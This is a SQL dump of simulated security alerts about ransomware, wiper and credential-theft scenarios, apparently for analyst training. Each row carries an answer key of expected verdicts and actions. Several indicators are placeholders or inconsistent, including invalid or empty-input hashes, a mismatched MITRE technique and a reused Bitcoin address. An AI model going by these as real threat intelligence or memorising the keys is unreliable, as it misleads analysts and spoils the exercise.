(507, 'Initial Breach Detected via EternalBlue', 'critical', 'Network Intrusion Detection System (NIDS)', 'An advanced attack was detected leveraging the EternalBlue vulnerability to gain unauthorized access to vulnerable systems within the network. The attacker initiated the breach from a known malicious IP address, targeting internal IP addresses, and executed a payload associated with the exploit.', 'Vulnerability Exploitation', 'T1210 - Exploitation of Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T07:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"event_type\":\"exploit_attempt\",\"vulnerability\":\"EternalBlue\",\"payload_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"NIDS\",\"filename\":\"exploit.dll\",\"username\":\"unknown\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with EternalBlue payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in exploit attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(508, 'Malicious Code Execution Initiated', 'critical', 'Endpoint Detection and Response (EDR)', 'An advanced remote code execution attempt has been detected. The attacker has initiated the WannaCry ransomware payload, beginning the encryption process on compromised systems.', 'Remote Code Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"edr_456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"source_port\":443,\"destination_port\":135,\"protocol\":\"TCP\",\"username\":\"compromised_user\",\"executed_command\":\"c:\\\\windows\\\\system32\\\\cmd.exe /c start wannacry.exe\",\"file_hash\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\Downloads\\\\wannacry.exe\",\"process_id\":12345,\"malware_name\":\"WannaCry\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with WannaCry attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches WannaCry ransomware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"malicious\",\"details\":\"Known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(509, 'Persistence Mechanism Established', 'high', 'System Logs', 'The attacker has established persistence on the compromised systems by modifying registry keys and creating scheduled tasks, ensuring the ransomware re-executes upon reboot.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"registry_key_modified\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"scheduled_task_created\":\"\\\\Windows\\\\System32\\\\Tasks\\\\MaliciousTask\",\"malware_file\":\"ransomware_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Filename commonly associated with ransomware attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(510, 'SMB Propagation Detected', 'high', 'Network Traffic Analysis', 'A potential lateral movement was detected on the network using the SMB protocol. An internal host is attempting to spread ransomware to other vulnerable machines within the network.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:22Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"malware_hash\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"malware_filename\":\"ransomware_payload.exe\",\"username\":\"jdoe\",\"activity\":\"smb_connection_attempt\",\"status\":\"failed\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential source of lateral movement within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential target of lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used in previous ransomware attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known ransomware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware propagation.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"suspicious\",\"details\":\"User potentially compromised for lateral movement activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(511, 'Kill-Switch Domain Investigated', 'high', 'DNS Query Logs', 'An investigation has identified suspicious DNS queries related to the WannaCry kill-switch mechanism. The queries originated from an internal host querying a known kill-switch domain, indicating potential infection or reconnaissance activity.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:30Z\",\"source_ip\":\"192.168.1.105\",\"queried_domain\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"query_type\":\"A\",\"response\":\"92.242.132.24\",\"associated_filename\":\"wannacry.exe\",\"associated_hash\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"internal_user\":\"jdoe\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_review\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known kill-switch domain for WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Executable known to be associated with WannaCry ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(512, 'Encryption Logic Analysis', 'high', 'File System Analysis', 'Analysts are examining the encryption logic of a ransomware strain to determine if there are any exploitable flaws that could allow decryption without payment. The analysis has identified several encrypted files and potential indicators of compromise.', 'Data Encryption', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"FS123456789\",\"user\":\"jdoe\",\"source_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"encrypted_document.docx\",\"malware_hash\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"encryption_algorithm\":\"AES-256\",\"process\":\"ransomware.exe\",\"internal_network\":\"192.168.1.0/24\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_document.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File is encrypted and cannot be opened without a decryption key.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee user account potentially impacted.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(513, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP) System', 'An advanced attempt to exfiltrate sensitive data was detected. Before encrypting files, the attacker tried to send critical company data to an external server.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:35Z\",\"event_type\":\"data_exfiltration_attempt\",\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file\":\"financial_report_q3_2023.xlsx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLP-20231010-001\",\"message\":\"Sensitive data transfer attempt detected and blocked by DLP.\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address from company network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with data exfiltration campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Registered employee username.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Database\",\"verdict\":\"clean\",\"details\":\"Legitimate company file.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(514, 'Ransom Note Deployment', 'high', 'User Reports', 'In the final step of the attack chain, the attacker deployed a ransom note to the affected systems, demanding payment in exchange for the decryption key. This action follows the encryption of critical files across multiple hosts.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_id\":\"1209\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"ransom_note_filename\":\"READ_ME.txt\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"message\":\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"host\":\"victim-host-01\",\"malware_name\":\"Ryuk\"}', '2026-01-06 01:34:24', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for Ryuk ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified as victim\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Account used during the attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Standard ransom note file for Ryuk\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Ryuk ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(515, 'Compromised Software Update Detected', 'high', 'Network Traffic Analysis', 'A malicious update for the accounting software \'FinancePro\' was detected being distributed from a trusted update channel, indicating a supply chain compromise. The update includes a known malicious payload linked to the Sandworm group.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"file_hash\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"file_name\":\"FinancePro_Update_v4.2.exe\",\"user\":\"jdoe\",\"update_channel\":\"update.financepro.com\",\"action\":\"download\",\"malware_family\":\"NotPetya\"}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Sandworm APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"FinancePro_Update_v4.2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected update file detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(516, 'MBR Overwriting Activity Observed', 'high', 'Endpoint Detection and Response (EDR)', 'An alert has been triggered due to the detection of destructive malware that targets the Master Boot Record (MBR) of the system. The malware, associated with the Sandworm group, attempts to overwrite the MBR, rendering the system unbootable under the guise of a ransomware attack. Immediate action is required to prevent further damage.', 'Destructive Malware Execution', 'T1490 - Inhibit System Recovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:58Z\",\"event_id\":\"EDR-4521\",\"system\":{\"hostname\":\"workstation-12\",\"ip_address\":\"192.168.1.45\",\"os\":\"Windows 10\"},\"user\":\"jdoe\",\"process\":{\"name\":\"malware_payload.exe\",\"path\":\"C:\\\\Windows\\\\Temp\\\\malware_payload.exe\",\"hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\"},\"network\":{\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443},\"action\":\"MBR overwrite attempt\",\"indicator_of_compromise\":{\"file_hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"attacker_ip\":\"203.0.113.5\"}}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known destructive malware hash associated with Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous malicious activities linked to Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(517, 'Mimikatz Credential Harvesting Detected', 'high', 'Security Information and Event Management (SIEM)', 'The attackers leverage Mimikatz to harvest credentials from compromised systems, preparing for rapid lateral movement across the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:33Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"logon_type\":\"Interactive\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\mimikatz.exe\",\"process_id\":\"5678\",\"hash\":\"6f5902ac237024bdd0c176cb93063dc4\",\"filename\":\"mimikatz.exe\",\"os_version\":\"Windows 10\",\"domain\":\"example.local\"}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with credential theft campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Executable file commonly used for credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(518, 'Rapid Lateral Movement Identified', 'high', 'Anomalous Account Activity', 'With credentials in hand, the attackers move laterally across the network, spreading the destructive wiper payload to additional systems.', 'Lateral Movement', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_source\":\"authentication_logs\",\"user\":\"jdoe_admin\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"192.168.1.101\",\"action\":\"login_success\",\"description\":\"Successful login using compromised credentials.\",\"malicious_file\":\"OlympicDestroyer_v2.exe\",\"file_hash\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\"}', '2026-01-06 01:37:06', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"malicious\",\"details\":\"Account used for unauthorized lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OlympicDestroyer_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Destructive malware associated with Sandworm APT.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known wiper malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL),
(519, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP)', 'An unauthorized data exfiltration attempt was detected involving the transfer of sensitive files to an external IP address. The threat actor, identified by the use of known malware hashes and suspicious IP addresses, attempted to leverage their access to exfiltrate critical data before initiating a destructive attack.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"action\":\"upload\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-EXFIL-005\",\"description\":\"Detected upload of sensitive data to external IP address\",\"malware_associated\":[\"NotPetya\"]}', '2026-01-06 01:37:06', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Filename flagged as containing sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
